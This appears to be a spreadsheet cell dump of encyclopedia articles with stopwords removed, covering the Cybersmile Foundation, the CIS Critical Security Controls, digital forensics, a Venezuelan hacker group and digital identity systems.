“impact challenge” would help organization provide education gamers around topics teamwork, resilience mental wellbeing.in march 2017, cybersmile announced partnership encourage diversity inclusion online help people affected negativity support wellbeing. number superstars including cesaro, dolph ziggler wwe’s chief brand officer, stephanie mcmahon took part coincided announcement.in april 2017, cybersmile foundation announced partnership brita support diverse, inclusive caring community. brita donated $80,000 organization support work.in october 2018, cybersmile foundation coty announced initiative cosmetics brand rimmel tackle beauty cyberbullying develop tool. campaign entitled #iwillnotbedeleted launched coincide announcement featured number prominent bloggers celebrities.in march 2019, cybersmile microsoft announced anti-cyberbullying partnership help raise funds organization’s smart assistant game streaming platform mixer. this part initiative called “the unawarenss movement” would bring together communities support positivity gaming. awards nominations cybersmile foundation received number awards nominations charitable work campaigns. argus achievement awards 2012 charity year chime communications graduate scheme 2012 winner talktalk digital heroes awards 2013 winner charity times charity awards 2013 best charity highly commended games good award 2017 nominated shorty awards immortal awards finalist 2018 body positivity campaign clio awards bronze best social media campaign 2018 body positivity campaign cannes bronze lion social trends 2018 body positivity campaign cannes silver lion social purpose 2018 body positivity campaign cannes gold lion social influencer/talent 2018 body positivity campaign campaign awards best charity campaign 2018 body positivity campaign british arrows most innovative video 2019 body positivity campaign british arrows best social video 2019 body positivity campaign british arrows charity public service 2019 body positivity campaign club award gold 2019 winner club award best social influencer marketing 2019 celebrity support cybersmile foundation works wide range celebrity influencer supporters help promote mission inclusive internet. celebrity supporters participated initiatives include: celine dion, paige spiranac, stephen curry, normani, fifth harmony, william shatner, david hasselhoff, johnny orlando, lauren orlando, krista allen, danielle peazer, becky lynch, cesaro, kofi kingston, dolph ziggler, show, kathryn bernardo, daniel padilla, katie cassidy, jordyn jones, kenzie ziegler, audrina patridge, meghan trainor, direction, seconds summer, jake zyrus, richard armitage, zoella, stephen fry, charlotte crosby chessie king.in june 2015, fifth harmony announced official ambassadors cybersmile.in september 2016, cybersmile foundation announced normani diversity ambassador. singer faced racial abuse social media wanted promote message inclusion fans support charity’s mission.in february 2017, cybersmile foundation announced golfer paige spiranac ambassador. spiranac participated number initiatives charity. also highlighted struggle online abuse chose support cybersmile exclusive feature sports illustrated.in october 2018, rita cara delevingne raised awareness cybersmile’s mission addressing issues surrounding beauty cyberbullying online abuse. cybersmile ambassadors fifth harmony richard armitage stephanie harvey daniel padilla kathryn bernardo paige spiranac normani kordei krista allen katie cassidy jake zyrus johnny orlando lauren orlando patrons campbell commodore doel brinton carol theobald helen hyde geoffrey theobald polly toynbee candy morris susan pyper tony baldry baroness stedman-scott lord ramsbotham lord taylor warwick beaumont brandie elish angiolini richard bridgeman, earl bradford robin bridgeman, viscount bridgeman douglas mckittrick christopher portman, 10th viscount portman references external links cybersmile foundation</t>
  </si>
  <si>
    <t>The CIS Critical Security Controls for Effective Cyber Defense</t>
  </si>
  <si>
    <t>controls (formerly called center internet security critical security controls effective cyber defense) publication best practice guidelines computer security. project initiated early 2008 response extreme data losses experienced organizations defense industrial base. publication initially developed sans institute. ownership transferred council cyber security (ccs) 2013, transferred center internet security (cis) 2015. originally known consensus audit guidelines also known csc, csc, sans goals guidelines consist (originally actions, called critical security controls (csc), organizations implement block mitigate known attacks. controls designed primarily automated means used implement, enforce monitor them. security controls give no-nonsense, actionable recommendations cyber security, written language that’s easily understood personnel. goals consensus audit guidelines include leveraging cyber offense inform cyber defense, focusing high payoff areas ensuring security investments focused counter highest threats maximizing automation enforce security controls, thereby negating human errors using consensus process collect best ideas controls version released 2021 https://www.cisecurity.org/media-mention/center-for-internet-security-updates-cis-controls-with-focus-on-cloud-mobile-and-remote-work/ implementation groups (igs) recommended guidance prioritize implementation controls. controls defines implementation group (ig1) basic cyber hygiene represents emerging minimum standard information security enterprises. on-ramp controls consists foundational cyber defense safeguards. safeguards included every enterprise apply defend common attacks. https://www.cisecurity.org/controls/cis-controls-list/ comprises additional safeguards builds upon safeguards identified ig1. safeguards selected help security teams cope increased operational complexity. some safeguards depend enterprise-grade technology specialized expertise properly install configure. enterprise employs individuals responsible managing protecting infrastructure. these enterprises typically support multiple departments differing risk profiles based function mission. small enterprise units regulatory compliance burdens. enterprises often store process sensitive client enterprise information withstand short interruptions service. major concern loss public confidence breach occurs. implementation groups (igs) recommended guidance prioritize implementation controls. comprises additional safeguards. builds upon safeguards identified (56) (74) totaling safeguards controls enterprise commonly employs security experts specialize different facets cybersecurity (e.g., risk management, penetration testing, application security). assets data contain sensitive information functions subject regulatory compliance oversight. enterprise must address availability services confidentiality integrity sensitive data. successful attacks cause significant harm public welfare. safeguards selected must abate targeted attacks sophisticated adversary reduce impact zero-day attacks. below list controls control inventory control enterprise assets control inventory control software assets control data protection control secure configuration enterprise assets software control account management control access control management control continuous vulnerability management control audit management control email browser protections control malware defenses control data recovery control network infrastructure management control network monitoring defense control security awareness skills training control service provider management control application software security control incident response management control penetration testing https://www.cisecurity.org/controls/cis-controls-list/ with release version also released risk assessment method (ram) v2.0 controls october 2021. recent release v2.1. "risk assessment method designed help enterprises justify investments implementing critical security controls (cis controls)." v2.1 "offers three different approaches support enterprises three levels capability, alignment controls implementation groups (igs)". developed series webinars guide users versions released. risk assessment method (ram) v2.1 implementation group (ig2) workshop conducted february 2022, recording available. june 2022, conducting another webinar reviews "how conduct risk assessment using v2.1 ig3." this series webinars moderated conducted principal author chris cronin. version released april 2019.csc inventory control hardware assets inventory control software assets continuous vulnerability assessment remediation controlled administrative privileges secure configurations hardware software mobile devices, laptops, workstations, servers maintenance, monitoring, analysis audit logs email browser protections malware defenses limitation control network ports, protocols, services data recovery capabilities secure configurations network devices firewalls, routers, switches boundary defense data protection controlled access based need know wireless access control account monitoring control implement security awareness training program application software security incident response management penetration tests team exercises implementation groups version introduced implementation groups, dividing controls sections: implementation group applicable companies (small large) implementation group additional controls storing sensitive information implementation group additional controls sensitive informationwith implementation groups, smaller companies need comply controls. previous versions version released august 2009. version released april 2011. version released february 2014 council cyber security (ccs).version released october 2015. version released august 2016 priorization version version released march 2018. version released april 2019. compared version version 6/6.1 re-prioritized controls changed controls: 'secure network engineering' version deleted version 6/6.1. 'csc email browser protections' added version 6/6.1.in version controls reshuffled. controls considered "basic", 7-16 "foundational" 17-20 "organizational". also released ram, information security risk assessment method help implement controls reasonably. contributors consensus audit guidelines (cag) compiled consortium contributors government agencies, commercial forensics experts testers. authors initial draft include members national security agency team blue team department homeland security, us-cert computer network defense architecture group joint task force global network operations (jtf-gno) defense cyber crime center (dc3) department energy alamos national lab, three national labs. department state, office ciso force army research laboratory department transportation, office department health human services, office ciso government accountability office (gao) mitre corporation sans institute notable results starting 2009, department state began supplementing risk scoring program part using consensus audit guidelines. according department's measurements, first year site scoring using approach department reduced overall risk unclassified network nearly percent overseas sites, percent domestic sites. external links “cis critical security controls” website (center internet security) direct link version (center internet security) direct link version (center internet security) “addressing consensus audit guidelines (cag) symantec™ risk automation suite” whitepaper (whitepaper symantec corporation) "fast track consensus audit guidelines (cag compliance" article (article published blog sponsored lieberman software corporation) "cis controls introduction sans back basics" whitepaper (whitepaper tripwire, inc.) "why agencies snub critical controls" "the controls that aren't" "cis risk assessment method (ram) v2.0 controls "link v2.1 download (authored center internet security halock security labs) references</t>
  </si>
  <si>
    <t>Digital forensics</t>
  </si>
  <si>
    <t>digital forensics (sometimes known digital forensic science) branch forensic science encompassing recovery, investigation, examination analysis material found digital devices, often relation mobile devices computer crime. term digital forensics originally used synonym computer forensics expanded cover investigation devices capable storing digital data. with roots personal computing revolution late 1970s early 1980s, discipline evolved haphazard manner 1990s, early 21st century national policies emerged. digital forensics investigations variety applications. common support refute hypothesis criminal civil courts. criminal cases involve alleged breaking laws defined legislation enforced police prosecuted state, murder, theft assault person. civil cases hand deal protecting rights property individuals (often associated family disputes) also concerned contractual disputes commercial entities form digital forensics referred electronic discovery (ediscovery) involved. forensics also feature private sector; internal corporate investigations intrusion investigation specialist probe nature extent unauthorized network intrusion). technical aspect investigation divided several sub-branches, relating type digital devices involved; computer forensics, network forensics, forensic data analysis mobile device forensics. typical forensic process encompasses seizure, forensic imaging (acquisition) analysis digital media production report collected evidence. well identifying direct evidence crime, digital forensics used attribute evidence specific suspects, confirm alibis statements, determine intent, identify sources (for example, copyright cases), authenticate documents. investigations much broader scope areas forensic analysis (where usual provide answers series simpler questions) often involving complex time-lines hypotheses. history prior 1970s crimes involving computers dealt using existing laws. first computer crimes recognized 1978 florida computer crimes act, included legislation unauthorized modification deletion data computer system. over next years range computer crimes committed increased, laws passed deal issues copyright, privacy/harassment (e.g., cyber bullying, happy slapping, cyber stalking, online predators) child pornography. 1980s federal laws began incorporate computer offences. canada first country pass legislation 1983. this followed federal computer fraud abuse 1986, australian amendments crimes acts 1989 british computer misuse 1990. 1980s–1990s: growth field growth computer crime 1980s 1990s caused enforcement agencies begin establishing specialized groups, usually national level, handle technical aspects investigations. example, 1984 launched computer analysis response team following year computer crime department within british metropolitan police fraud squad. well enforcement professionals, many early members groups also computer hobbyists became responsible field's initial research direction.one first practical least publicized) examples digital forensics cliff stoll's pursuit hacker markus hess 1986. stoll, whose investigation made computer network forensic techniques, specialized examiner. many earliest forensic examinations followed profile.throughout 1990s high demand new, basic, investigative resources. strain central units lead creation regional, even local, level groups help handle load. example, british national hi-tech crime unit 2001 provide national infrastructure computer crime; personnel located centrally london various regional police forces (the unit folded serious organised crime agency (soca) 2006).during period science digital forensics grew ad-hoc tools techniques developed hobbyist practitioners. this contrast forensics disciplines developed work scientific community. 1992 term "computer forensics" used academic literature (although prior informal use); paper collier spaul attempted justify discipline forensic science world. this swift development resulted lack standardization training. 1995 book, "high-technology crime: investigating cases involving computers", rosenblatt wrote: seizing, preserving, analyzing evidence stored computer greatest forensic challenge facing enforcement 1990s. although forensic tests, fingerprinting testing, performed specially trained experts task collecting analyzing computer evidence often assigned patrol officers detectives. 2000s: developing standards since 2000, response need standardization, various bodies agencies published guidelines digital forensics. scientific working group digital evidence (swgde) produced 2002 paper, "best practices computer forensics", followed, 2005, publication standard (iso 17025, general requirements competence testing calibration laboratories). european international treaty, convention cybercrime, came force 2004 reconciling national computer crime laws, investigative techniques international co-operation. treaty signed nations (including canada, japan, south africa, european nations) ratified issue training also received attention. commercial companies (often forensic software developers) began offer certification programs digital forensic analysis included topic specialist investigator training facility, centrex.since late 1990s mobile devices become widely available, advancing beyond simple communication devices, found rich forms information, even crime traditionally associated digital forensics. despite this, digital analysis phones lagged behind traditional computer media, largely problems proprietary nature devices.focus also shifted onto internet crime, particularly risk cyber warfare cyberterrorism. february 2010 report united states joint forces command concluded: through cyberspace, enemies target industry, academia, government, well military air, land, maritime, space domains. much airpower transformed battlefield world cyberspace fractured physical barriers shield nation attacks commerce communication. field digital forensics still faces unresolved issues. 2009 paper, "digital forensic research: good, unaddressed", peterson shenoi identified bias towards windows operating systems digital forensics research. 2010 simson garfinkel identified issues facing digital investigations future, including increasing size digital media, wide availability encryption consumers, growing variety operating systems file formats, increasing number individuals owning multiple devices, legal limitations investigators. paper also identified continued training issues, well prohibitively high cost entering field. development forensic tools during 1980s specialized digital forensic tools existed, consequently investigators often performed live analysis media, examining computers within operating system using existing sysadmin tools extract evidence. this practice carried risk modifying data disk, either inadvertently otherwise, claims evidence tampering. number tools created early 1990s address problem. need software first recognized 1989 federal enforcement training center, resulting creation imdump michael white) 1990, safeback (developed sydex). similar software developed countries; dibs hardware software solution) released commercially 1991, mckemmish released fixed disk image free australian enforcement. these tools allowed examiners create exact copy piece digital media work leaving original disk intact verification. 1990s, demand digital evidence grew advanced commercial tools encase developed, allowing analysts examine copies media without using live forensics. more recently, trend towards "live memory forensics" grown resulting availability tools windowsscope. more recently, progression tool development occurred mobile devices; initially investigators accessed data directly device, soon specialist tools radio tactics aceso appeared. forensic process digital forensic investigation commonly consists stages: acquisition imaging exhibits, analysis, reporting. ideally acquisition involves capturing image computer's volatile memory (ram) creating exact sector level duplicate "forensic duplicate") media, often using write blocking device prevent modification original. however, growth size storage media developments cloud computing 'live' acquisitions whereby 'logical' copy data acquired rather complete image physical storage device. both acquired image logical copy) original media/data hashed (using algorithm sha-1 md5) values compared verify copy accurate.an alternative (and patented) approach (that dubbed 'hybrid forensics' 'distributed forensics') combines digital forensics ediscovery processes. this approach embodied commercial tool called iseek presented together test results conference 2017.during analysis phase investigator recovers evidence material using number different methodologies tools. 2002, article international journal digital evidence referred step in-depth systematic search evidence related suspected crime." 2006, forensics researcher brian carrier described "intuitive procedure" obvious evidence first identified "exhaustive searches conducted start filling holes."the actual process analysis vary investigations, common methodologies include conducting keyword searches across digital media (within files well unallocated slack space), recovering deleted files extraction registry information (for example list user accounts, attached devices). evidence recovered analysed reconstruct events actions reach conclusions, work often performed less specialised staff. when investigation complete data presented, usually form written report, persons' terms. application digital forensics commonly used criminal private investigation. traditionally associated criminal law, evidence collected support oppose hypothesis courts. areas forensics often part wider investigation spanning number disciplines. cases, collected evidence used form intelligence gathering, used purposes court proceedings (for example locate, identify halt crimes). result, intelligence gathering sometimes held less strict forensic standard. civil litigation corporate matters digital forensics forms part electronic discovery ediscovery) process. forensic procedures similar used criminal investigations, often different legal requirements limitations. outside courts digital forensics form part internal corporate investigations. common example might following unauthorized network intrusion. specialist forensic examination nature extent attack performed damage limitation exercise, establish extent intrusion attempt identify attacker. such attacks commonly conducted phone lines 1980s, modern usually propagated internet.the main focus digital forensics investigations recover objective evidence criminal activity (termed actus reus legal parlance). however, diverse range data held digital devices help areas inquiry. attribution meta data logs used attribute actions individual. example, personal documents computer drive might identify owner. alibis statements information provided involved cross checked digital evidence. example, investigation soham murders offender's alibi disproved mobile phone records person claimed showed town time. intent well finding objective evidence crime committed, investigations also used prove intent (known legal term mens rea). example, internet history convicted killer neil entwistle included references site discussing kill people. evaluation source file artifacts meta-data used identify origin particular piece data; example, older versions microsoft word embedded global unique identifier files identified computer created proving whether file produced digital device examined obtained elsewhere (e.g., internet) important. document authentication related "evaluation source," meta data associated digital documents easily modified (for example, changing computer clock affect creation date file). document authentication relates detecting identifying falsification details. limitations major limitation forensic investigation encryption; disrupts initial examination pertinent evidence might located using keywords. laws compel individuals disclose encryption keys still relatively controversial. always frequently solutions brute force passwords bypass encryption, smartphones means bootloader techniques content device first acquired later forced order find password encryption key. legal considerations examination digital media covered national international legislation. civil investigations, particular, laws restrict abilities analysts undertake examinations. restrictions network monitoring, reading personal communications often exist. during criminal investigation, national laws restrict much information seized. example, united kingdom seizure evidence enforcement governed pace act. during existence early field, "international organization computer evidence" (ioce) agency worked establish compatible international standards seizure evidence.in laws covering computer crime also affect forensic investigators. 1990 computer misuse legislates unauthorised access computer material; particular concern civil investigators limitations enforcement. individual's right privacy area digital forensics still largely undecided courts. electronic communications privacy places limitations ability enforcement civil investigators intercept access evidence. makes distinction stored communication (e.g. email archives) transmitted communication (such voip). latter, considered privacy invasion, harder obtain warrant for. ecpa also affects ability companies investigate computers communications employees, aspect still debate extent company perform monitoring.article european convention human rights asserts similar privacy limitations ecpa limits processing sharing personal data within external countries. ability enforcement conduct digital forensics investigations legislated regulation investigatory powers act. digital evidence when used court digital evidence falls legal guidelines forms evidence; courts usually require stringent guidelines. united states federal rules evidence used evaluate admissibility digital evidence, united kingdom pace civil evidence acts similar guidelines many countries laws. federal laws restrict seizures items obvious evidential value. this acknowledged always possible establish digital media prior examination.laws dealing digital evidence concerned issues: integrity authenticity. integrity ensuring seizing acquiring digital media modify evidence (either original copy). authenticity refers ability confirm integrity information; example imaged media matches original evidence. ease digital media modified means documenting chain custody crime scene, analysis and, ultimately, court, form audit trail) important establish authenticity evidence.attorneys argued digital evidence theoretically altered undermines reliability evidence. judges beginning reject theory, case bonallo court ruled "the fact possible alter data contained computer plainly insufficient establish untrustworthiness." united kingdom guidelines issued acpo followed help document authenticity integrity evidence. digital investigators, particularly criminal investigations, ensure conclusions based upon factual evidence expert knowledge. example, federal rules evidence state qualified expert testify form opinion otherwise” long testimony based upon sufficient facts data, testimony product reliable principles methods, witness applied principles methods reliably facts case. sub-branches digital forensics specific guidelines conduct investigations handling evidence. example, mobile phones required placed faraday shield seizure acquisition prevent radio traffic device. forensic examination computers criminal matters subject acpo guidelines. there also international approaches providing guidance handle electronic evidence. "electronic evidence guide" council europe offers framework enforcement judicial authorities countries seek enhance guidelines identification handling electronic evidence. investigative tools admissibility digital evidence relies tools used extract forensic tools subjected daubert standard, judge responsible ensuring processes software used acceptable. 2003 paper brian carrier argued daubert guidelines required code forensic tools published peer reviewed. concluded "open source tools clearly comprehensively meet guideline requirements would closed source tools." 2011 josh brunty stated scientific validation technology software associated performing digital forensic examination critical laboratory process. argued "the science digital forensics founded principles repeatable processes quality evidence therefore knowing design properly maintain good validation process requirement digital forensic examiner defend methods court." branches digital forensics investigation restricted retrieve data merely computer, laws breached criminals small digital devices (e.g. tablets, smartphones, flash drives) extensively used. some devices volatile memory non-volatile memory. sufficient methodologies available retrieve data volatile memory, however, lack detailed methodology framework data retrieval non-volatile memory sources. depending type devices, media artifacts, digital forensics investigation branched various types. computer forensics goal computer forensics explain current state digital artifact; computer system, storage medium electronic document. discipline usually covers computers, embedded systems (digital devices rudimentary computing power onboard memory) static memory (such drives). computer forensics deal broad range information; logs (such internet history) actual files drive. 2007 prosecutors used spreadsheet recovered computer joseph edward duncan show premeditation secure death penalty. sharon lopatka's killer identified 2006 email messages detailing torture death fantasies found computer. mobile device forensics mobile device forensics sub-branch digital forensics relating recovery digital evidence data mobile device. differs computer forensics mobile device inbuilt communication system (e.g. gsm) and, usually, proprietary storage mechanisms. investigations usually focus simple data call data communications (sms/email) rather in-depth recovery deleted data. data mobile device investigation helped exonerate patrick lumumba murder meredith kercher.mobile devices also useful providing location information; either inbuilt gps/location tracking cell site logs, track devices within range. such information used track kidnappers thomas onofri 2006. network forensics network forensics concerned monitoring analysis computer network traffic, local wan/internet, purposes information gathering, evidence collection, intrusion detection. traffic usually intercepted packet level, either stored later analysis filtered real-time. unlike areas digital forensics network data often volatile rarely logged, making discipline often reactionary. 2000 lured computer hackers aleksey ivanov gorshkov united states fake interview. monitoring network traffic pair's computers, identified passwords allowing collect evidence directly russian-based computers. forensic data analysis forensic data analysis branch digital forensics. examines structured data discover analyze patterns fraudulent activities resulting financial crime. database forensics database forensics branch digital forensics relating forensic study databases metadata. investigations database contents, files in-ram data build timeline recover relevant information. forensics forensics branch digital forensics goal identifying extracting digital information devices belonging internet things field, used forensics investigations potential source evidence. also list digital forensics tools cyberspace forensic search glossary digital forensics terms outline forensic science references further reading årnes, andré (2018). digital forensics. wiley isbn 978-1-119-26238-1. carrier, brian (february 2006). "risks live digital forensic analysis". communications acm. (2): 56–61. doi:10.1145/1113034.1113069. issn 0001-0782. s2cid 16829457. crowley, paul. forensics. rockland, syngress. isbn 978-1597491280. kanellis, panagiotis january 2006). digital crime forensic science cyberspace. publishing. 357. isbn 978-1-59140-873-4. jones, andrew (2008). building digital forensic laboratory. butterworth-heinemann. 312. isbn 978-1-85617-510-4. marshell, angus (2008). digital forensics: digital evidence criminal investigation. wiley-blackwell. 148. isbn 978-0-470-51775-8. sammons, john (2012). basics digital forensics: primer getting started digital forensics. syngress. isbn 978-1597496612. related journals journal digital forensics, security international journal digital crime forensics journal digital investigation international journal digital evidence international journal forensic computer science journal digital forensic practice small scale digital device forensic journal external links scientific working group digital evidence digital forensics case studies</t>
  </si>
  <si>
    <t>The Binary Guardians</t>
  </si>
  <si>
    <t>binary guardians group hackers claimed responsibility several attacks government private websites venezuela. group made informatic security analysts several years experience. external links official website</t>
  </si>
  <si>
    <t>Digital identity</t>
  </si>
  <si>
    <t>digital identity information used computer systems represent external agent person, organization, application, device. digital identities allow access services provided computers automated make possible computers mediate relationships. digital identities widespread many discussions refer entire collection information generated person's online activity "digital identity". this includes usernames passwords, search history, birthdate, social security number, purchase history, especially information publicly available anonymized used others discover person's civil identity. broader sense, digital identity facet person's social identity also referred online identity.people's digital identities often linked civil national identities, many countries instituted national digital identity systems provide digital identities citizenry. with self-sovereign identity, user means generating controlling unique identifiers well store identity data. legal social effects digital identity complex challenging. background critical problem cyberspace knowing interacting. using static identifiers password email, precisely determine identity person cyberspace information stolen used many individuals acting one. digital identity based dynamic entity relationships captured behavioral history across multiple websites mobile apps verify authenticate identity accuracy.by comparing entity relationships event (e.g., login) past events, pattern convergence verify authenticate identity legitimate divergence indicates attempt mask identity. data used digital identity generally anonymized using one-way hash, thereby avoiding privacy concerns. because based behavioral history, digital identity hard fake steal. related terms subject entity digital identity also referred digital subject digital entity digital representation claims made party another person, group, thing concept. attributes, preferences traits attributes digital identity acquired contain information subject, medical history, purchasing behaviour, bank balance, preferences retain subject's choices favourite brand shoes, preferred currency. traits features subject inherent, colour, nationality, place birth. although attributes subject change easily, traits change slowly, all. digital identity also entity relationships derived devices, environment locations individual active internet. technical aspects issuance digital identities issued digital certificates. these certificates contain data associated user issued legal guarantees recognized certification authorities. trust, authentication authorization order assign digital representation entity, attributing party must trust claim attribute (such name, location, role employee, age) correct associated person thing presenting attribute. conversely, individual claiming attribute grant selective access information (e.g., proving identity paypal authentication payment website). way, digital identity better understood particular viewpoint within mutually-agreed relationship objective property. authentication authentication assurance identity entity another. aspect digital trust. general, business-to-business authentication designed security, user-to-business authentication designed simplicity. authentication techniques include presentation unique object bank credit card, provision confidential information password answer pre-arranged question, confirmation ownership email address, robust costly techniques using encryption. physical authentication techniques include iris scanning, handprinting, voiceprinting; techniques called biometrics. static identifiers (e.g., username password) personal unique attributes (e.g., biometrics) called multi-factor authentication secure component alone. whilst technological progress authentication continues evolve, systems prevent aliases used. introduction strong authentication online payment transactions within european union links verified person account, person identified accordance statutory requirements prior account opened. verifying person opening account online typically requires form device binding credentials used. this verifies device stands person internet actually individual's device device someone simply claiming individual. concept reliance authentication makes pre-existing accounts, piggy back services upon accounts, providing original source reliable. concept reliability comes various anti-money laundering counter-terrorism funding legislation eu28, australia, singapore zealand second parties place reliance customer diligence process first party, first party financial institution. example reliance authentication paypal's verification method. authorization authorization determination entity controls resources authenticated access resources. authorization depends authentication, authorization requires critical attribute (i.e., attribute determines authorizer's decision) must verified. example, authorization credit card gives access resources owned amazon, e.g., amazon sends product. authorization employee provide employee access network resources, printers, files, software. example, database management system might designed provide certain specified individuals ability retrieve information database ability change data stored database, giving individuals ability change data.consider person rents checks hotel credit card. rental hotel company request authentication credit enough accident, profligate spending room service. thus card later refused trying purchase activity balloon trip. though adequate credit rental, hotel, balloon trip, insufficient amount also cover authorizations. actual charges authorized leaving hotel returning car, late balloon trip. valid online authorization requires analysis information related digital event including device environmental variables. these generally derived data exchanged device business server internet. digital identifiers digital identity requires digital identifiers—strings tokens unique within given scope (globally locally within specific domain, community, directory, application, etc.). identifiers classified omnidirectional unidirectional. omnidirectional identifiers public easily discoverable, whereas unidirectional identifiers intended private used context specific identity relationship. identifiers also classified resolvable non-resolvable. resolvable identifiers, domain name email address, easily dereferenced entity represent, current state data providing relevant attributes entity. non-resolvable identifiers, person's real name, name subject topic, compared equivalence otherwise machine-understandable. there many different schemes formats digital identifiers. uniform resource identifier (uri) nternationalized version internationalized resource identifier (iri) standard identifiers websites world wide web. openid light-weight identity authentication protocols standard http uris (often called urls). uniform resource name persistent, location-independent identifier assigned within defined namespace. digital object architecture digital object architecture means managing digital information network environment. digital object architecture, digital object machine platform independent structure allows identified, accessed protected, appropriate. digital object incorporate informational elements, i.e., digitized version paper, movie sound recording, also unique identifier digital object metadata digital object. metadata include restrictions access digital objects, notices ownership, identifiers licensing agreements, appropriate. handle system handle system general purpose distributed information system provides efficient, extensible, secure identifier resolution services networks internet. includes open protocols, namespace, reference implementation protocols. protocols enable distributed computer system store identifiers, known handles, arbitrary resources resolve handles information necessary locate, access, contact, authenticate, otherwise make resources. this information changed needed reflect current state identified resource without changing identifier, thus allowing name item persist changes location related state information. original version handle system technology developed support defense advanced research projects agency. extensible resource identifiers oasis standard abstract, structured identifiers, (extensible resource identifiers), adds features uris iris especially useful digital identity systems. openid also supports xris, xris basis i-names. risk-based authentication risk-based authentication application digital identity whereby multiple entity relationship device (e.g., operating system), environment (e.g., server) data entered user given transaction evaluated correlation events known behaviors identity. analysis performed based quantifiable metrics, transaction velocity, locale settings attempts obfuscate), user-input data (such ship-to address). correlation deviation mapped tolerances scored, aggregated across multiple entities compute transaction risk-score, assess risk posed organization. policy aspects there proponents treating self-determination freedom expression digital identity human right. some speculated digital identities could become form legal entity. taxonomies identity digital identity attributes exist within context ontologies. development digital identity network solutions interoperate taxonomically diverse representations digital identity contemporary challenge. free-tagging emerged recently effective circumventing challenge date, primarily application identity digital entities bookmarks photos) effectively flattening identity attributes single, unstructured layer. however, organic integration benefits structured fluid approaches identity attribute management remains elusive. networked identity identity relationships within digital network include multiple identity entities. however, decentralized network like internet, extended identity relationships effectively requires existence independent trust relationships pair entities relationship means reliably integrating paired relationships larger relational units. identity relationships reach beyond context single, federated ontology identity (see taxonomies identity above), identity attributes must somehow matched across diverse ontologies. development network approaches embody integrated "compound" trust relationships currently topic much debate blogosphere. integrated compound trust relationships allow, example, entity accept assertion claim entity entity thus vouches aspect identity feature "compound" trust relationships possibility selective disclosure entity another locally relevant information. illustration potential application selective disclosure, suppose certain diana wished book hire without disclosing irrelevant personal information (using notional digital identity network supports compound trust relationships). adult, resident current driving license, diana might uk's driver vehicle licensing agency vouch driving qualification, nationality car-rental company without name contact details disclosed. similarly, diana's bank might assert banking details rental company. selective disclosure allows appropriate privacy information within network identity relationships. classic form networked digital identity based international standards "white pages". electronic white pages links various devices, like computers telephones, individual organization. various attributes x.509v3 digital certificates secure cryptographic communications captured schema, published ldap x.500 directory. changes ldap standard managed working groups ietf, changes x.500 managed iso. significant analysis gaps digital identity interoperability fgidm (ƒfocus group identity management). implementations x.500[2005] ldapv3 occurred worldwide primarily located major data centers administrative policy boundaries regarding sharing personal information. since combined x.500 [2005] ldapv3 directories hold millions unique objects rapid access, expected play continued role large scale secure identity access services. ldapv3 lightweight standalone server, original design tcp-ip based lightweight directory access protocol compatible making queries x.500 mesh servers native protocol. this done scaling individual servers larger groupings represent defined "administrative domains", (such country level digital object) value present original "white pages" used look phone numbers email addresses, largely available non-authoritative search engines. ability leverage extend networked digital identity made practicable expression level trust associated given identity common identity assurance framework. security privacy issues several writers pointed tension services digital identity hand user privacy other.services gather store data linked digital identity turn linked user's real identity learn great deal individuals. gdpr attempt address concern using regulation. many systems provide privacy-related mitigations analyzing data linked digital identities. common mitigation data anonymization, hashing user identifiers cryptographic hash function. another popular technique adding statistical noise data reduce identifiability, differential privacy. although digital identity allows consumers transact anywhere easily manage various cards, also poses potential single point compromise malicious hackers steal personal information. social aspects digital rhetoric term digital identity used academic field digital rhetoric denote identity "rhetorical construction." digital rhetoric concerned identities formed, negotiated, influenced, challenged ever-evolving digital environments. being aware different rhetorical situations complex digital spaces important effective communication scholars argue individuals’ ability evaluate rhetorical situations necessary constructing appropriate identity different rhetorical circumstances. addition that, physical digital identities cannot separated visual affordances shape representation physical identity online spaces. argues, “what online requires continuity—or least fluidity—between online off-line selves.” positioning digital identity rhetoric, scholars attention issues race, gender, agency, power manifested digital spaces. some radical theorists "posited cyberspace would liberate people bodies, blur lines human technology." other scholars theorized ‘‘disembodied’’ communication "could free society discrimination based race, sex, gender, sexuality, class." even more, construction digital identity also tied network. this seen practices reputation management companies work creating positive identity, personal company's accounts show higher various search engines. legal issues clare sullivan presents grounds digital identity emerging legal concept. uk's identity cards 2006 confirms sullivan's argument unfolds legal concept involving database identity transaction identity. database identity collection data registered individual within databases scheme transaction identity information defines individual's identity transactional purposes. although reliance verification identity, none processes used entirely trustworthy. consequences digital identity abuse fraud potentially serious, since possible implications person held legally responsible. business aspects corporations recognizing power internet tailor online presence individual customer. purchase suggestions, personalized adverts tailored marketing strategies great success businesses. such tailoring however, depends ability connect attributes preferences identity visitor. technology enable direct value transfer rights non-bearer assets, human agency must conveyed, including authorization, authentication identification buyer and/or seller, well “proof life,” without third party. digital death digital death phenomenon people continuing internet accounts deaths. this results several ethical issues concerning information stored deceased person used stored given family members. also result confusion automated social media features birthday reminders, well uncertainty deceased person's willingness pass personal information third party. many social media platforms clear policies digital death. there many companies secure digital identities death legally pass deceased people's families. national digital identity systems although many facets digital identity universal owing part ubiquity internet, regional variations exist specific laws, practices government services place. example, digital identy services validate driving licences, passports physical documents online help improve quality digital identity. also, strict policies money laundering mean services, money transfers need stricter level validation digital identity. digital identity national sense mean combination single sign and/or validation assertions trusted authorities (generally government). asia china china's resident identity card cross references services (banking, internet service providers, etc.) thus acts digital identity system. india india, aadhaar card used digital service, mainly government institutions. iran iranian national smart card ubiquitous singapore singapore's singpass extended national digital identity government services, though intent extend private institutions. corporate login version called corppass. europe european union june 2021, european commission proposed framework european digital identity. planned available citizens, residents, business within though suitable online offline private public services, used participants personal identification provide confirmation specific personal information. benefits included wide recognition every digital identity card, secure control amount data information user wants share services well simple operation digital wallets using several mobile devices. estonia estonia's identity card used governments third parties authentication. germany there online card available germany. user identify securely internet, vending machines several citizen terminals. thereby business authority matters easily worked electronically save time, cost money. framework competition called "schaufenster sichere digitale identitäten", german federal ministry economy energy created project, called "idunion". this project launched april 2021, aims create opportunity inhabitants easier access education, mobility, e-government, industry, health care much more. italy italy's spid used digital public private institutions. monaco since june 2021, monaco citizens residents digital public institutions access telecom electricity services. ukraine ukraine introduced online cards april 2020 going equate paper documents. ukrainian citizens able called diia identification purposes. ukraine plans fully legalize online documents august 2021, every user able choose whether paper documents digital ones authorities able demand paper documents citizens digital ones. digital identity used provision public government services also receive deliveries, confirm supermarkets open bank accounts. united kingdom uk's gov.uk verify allows third parties validate assertions. australia australia, mygov/mygovid australia post digitalid provide means single sign mygov currently supports government agencies, whereas australia post's digitalid solution supports private institutions. caribbean caribbean represent particular challenges region's geographies, political context, social 